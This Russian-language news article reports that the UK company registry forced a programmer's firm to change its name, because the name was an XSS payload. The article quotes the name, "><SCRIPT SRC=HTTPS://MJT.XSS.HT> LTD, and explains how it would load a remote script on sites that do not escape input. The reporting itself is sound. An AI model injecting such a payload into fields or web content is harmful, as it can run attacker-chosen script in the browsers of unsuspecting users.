ТЕХНОЛОГИИ

В Великобритании переименовали компанию с HTML-тегом в названии

Марко Кушнир 9 ноября 2020, 14:25

Регистрационная палата Великобритании заставила изменить имя местную компанию из-за потенциального риска кибератаки. Всему виной элементы HTML-кода в названии, пишет The Guardian.

Что случилось

Регистрационная палата Великобритании заставила компанию “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD изменить название. Такое решение приняли, чтобы не подвергать риску кибербезопасность палаты и ее пользователей.
Компанию с таким названием зарегистрировал британский программист, который посчитал, что элементы HTML-кода в названии будут выглядеть забавно. Правда, он не учел необходимость соблюдать кибербезопасность, включая защиту от межсайтового скриптинга. Это вид атаки, в которой злоумышленник может внедрить скрипт в выдаваемую веб-приложением страницу, чтобы затем выполнить его в браузере пользователя.
Если начать название с символов “>, то любой сайт, который не смог должным образом обработать HTML-код, ошибочно решит, что название компании пустое. Затем он загрузит и выполнит скрипт с сайта XSS Hunter. Разработчики используют его для поиска ошибок, связанных с межсайтовым скриптингом.
Новое название компании тоже забавное — THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD (Компания, которая использовала HTML-теги в названии).

Читайте также

Что (не)так с Black Friday. Откуда пошла традиция и почему не стоит бояться больших скидок

Открыть бизнес за границей. Как получить средства на новое дело в ЕС

Как купить USDT через обменник. Подробная инструкция

TemplateMonster — 20 лет. История компании от маленькой вебстудии до маркетплейса из 175 000 продуктов

Международная IT-компания Astound Commerce набирает людей в команду. Кого именно ищут и почему вы захотите там работать

Сохранение позиций на рынке, йога онлайн, покупка Starlink. Как Govitall работает во время войны

Еще один «Дон Кихот». Как беларус создал приложение для высмеивания путинской пропаганды и почему это вызывает дежавю

Новые услуги и поддержка Украины. Как в FAVBET адаптировали работу и продукт военные реалии

30 докладов об IT и сбор средств на ВСУ. Что будет на международной IТ-конференции NIX MultiConf

Калиновый венок и символы войны. Morphy.vision создала AR-фильтр в рамках open call от Banda и Brave.ua